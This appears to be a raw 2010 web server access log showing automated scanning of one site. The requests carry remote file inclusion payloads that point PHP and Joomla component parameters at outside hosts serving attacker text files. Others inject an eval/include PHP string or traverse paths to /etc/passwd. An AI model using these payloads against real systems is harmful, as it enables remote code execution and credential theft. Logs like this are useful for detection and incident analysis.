121.101.214.54 - - [12/Mar/2010:08:58:22 -0800] "GET /inc/header.php/step_one.php?server_inc=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [12/Mar/2010:08:58:22 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [12/Mar/2010:08:58:22 -0800] "GET /logs/access_090712.log%20%20//inc/header.php/step_one.php?server_inc=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.221 - - [12/Mar/2010:08:58:26 -0800] "GET /logs/access_080219.log HTTP/1.0" 200 1432781 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
118.129.170.49 - - [12/Mar/2010:08:58:28 -0800] "GET /logs/access_091125.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:08:58:53 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:08:58:54 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:08:58:54 -0800] "GET /logs/access_080704.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:08:58:54 -0800] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:08:59:39 -0800] "GET /logs/access_080215.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:08:59:39 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:08:59:39 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [12/Mar/2010:08:59:40 -0800] "GET /logs/access_090626.log%20%20//inc/header.php/step_one.php?server_inc=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:08:59:45 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:08:59:45 -0800] "GET /logs/access_080215.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:59:46 -0800] "GET /logs/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:08:59:46 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:59:46 -0800] "GET /logs/access_081103.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:59:46 -0800] "GET /logs/access_090107.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:59:47 -0800] "GET /%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:59:47 -0800] "GET /%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:59:47 -0800] "GET /logs/access_081103.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:59:47 -0800] "GET /logs/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:59:48 -0800] "GET /logs/access_090107.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:59:49 -0800] "GET /logs/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:59:49 -0800] "GET /%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:59:49 -0800] "GET /logs/access_090107.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:59:49 -0800] "GET /logs/access_081103.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:08:59:53 -0800] "GET /logs/access_080326.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:08:59:54 -0800] "GET /logs/access_080326.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [12/Mar/2010:09:00:11 -0800] "GET /logs/access_090712.log//inc/header.php/step_one.php?server_inc=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.49.211.210 - - [12/Mar/2010:09:00:14 -0800] "GET /logs/access_081002.log=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.dmulk.com"
66.49.211.210 - - [12/Mar/2010:09:00:14 -0800] "GET /logs/access_090122.log=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:00:18 -0800] "GET /logs/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:00:19 -0800] "GET /logs/access_081103.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:00:19 -0800] "GET /logs/access_090107.log/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:00:19 -0800] "GET /%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:09:00:21 -0800] "GET /environment.php?DIR_PREFIX=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:09:00:21 -0800] "GET /logs/environment.php?DIR_PREFIX=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:09:00:21 -0800] "GET /logs/access_090209.log%20%20/environment.php?DIR_PREFIX=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [12/Mar/2010:09:00:23 -0800] "GET /logs/access_090626.log//inc/header.php/step_one.php?server_inc=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:09:00:29 -0800] "GET /environment.php?DIR_PREFIX=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:09:00:29 -0800] "GET /logs/environment.php?DIR_PREFIX=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:09:00:29 -0800] "GET /logs/access_090209.log%20%20/environment.php?DIR_PREFIX=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:01:43 -0800] "GET /logs/access_090424.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:01:59 -0800] "GET /logs/access_090424.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:02:00 -0800] "GET /logs/access_090424.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:02:00 -0800] "GET /logs/access_090424.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:02:22 -0800] "GET /%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:02:32 -0800] "GET /logs/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:02:32 -0800] "GET /logs/access_080919.log%20%20/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:09:02:34 -0800] "GET /logs/access_080326.log%20%20//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:09:02:34 -0800] "GET /logs/access_080215.log%20%20//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:02:48 -0800] "GET /%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:09:02:48 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:09:02:49 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:09:02:49 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:02:51 -0800] "GET /atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:02:51 -0800] "GET /logs/access_091218.log//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:02:51 -0800] "GET /logs//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:09:02:52 -0800] "GET /logs/access_080215.log%20%20//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.154 - - [12/Mar/2010:09:02:52 -0800] "GET /logs/access_080326.log%20%20//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:02:54 -0800] "GET /logs/access_080919.log%20%20/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:02:55 -0800] "GET /logs/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:03:08 -0800] "GET /%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:03:12 -0800] "GET /logs/access_080905.log%20%20/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:03:14 -0800] "GET /logs/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:03:14 -0800] "GET /logs/access_080919.log%20%20/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:03:18 -0800] "GET /%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:09:03:18 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:09:03:18 -0800] "GET /logs/access_080509.log//admin/business_inc/saveserver.php?thisdir=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:09:03:18 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.208.46.145 - - [12/Mar/2010:09:03:22 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.245.21.69 - - [12/Mar/2010:09:03:23 -0800] "GET /logs/access_090530.log//admin/business_inc/saveserver.php?thisdir=http://www.muzykologia.lublin.pl/templates/system/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:03:25 -0800] "GET /atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:03:25 -0800] "GET /logs//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:03:25 -0800] "GET /logs/access_091218.log%20%20//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:03:26 -0800] "GET /logs/access_080919.log%20%20/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:03:27 -0800] "GET /logs/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:03:32 -0800] "GET /atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:03:32 -0800] "GET /logs//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:03:32 -0800] "GET /logs/access_091218.log%20%20//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [12/Mar/2010:09:03:40 -0800] "GET /logs/access_081223.log//inc/header.php/step_one.php?server_inc=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:41 -0800] "GET /logs/access_090327.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:41 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:03:42 -0800] "GET /atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:03:42 -0800] "GET /logs//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:03:42 -0800] "GET /logs/access_091218.log%20%20//atom.php5?page=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:09:03:44 -0800] "GET /logs/access_080905.log%20%20/%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:45 -0800] "GET /logs/access_090327.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:45 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:45 -0800] "GET /logs/access_090327.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:45 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:46 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:46 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:03:46 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:03:46 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:03:46 -0800] "GET /logs/access_080205.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:46 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
99.57.90.154 - - [12/Mar/2010:09:03:50 -0800] "GET /logs/access_090425.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:53 -0800] "GET /logs/access_090327.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:53 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:54 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:56 -0800] "GET /logs/access_090424.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:56 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:57 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:57 -0800] "GET /logs/access_090424.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:57 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:03:57 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
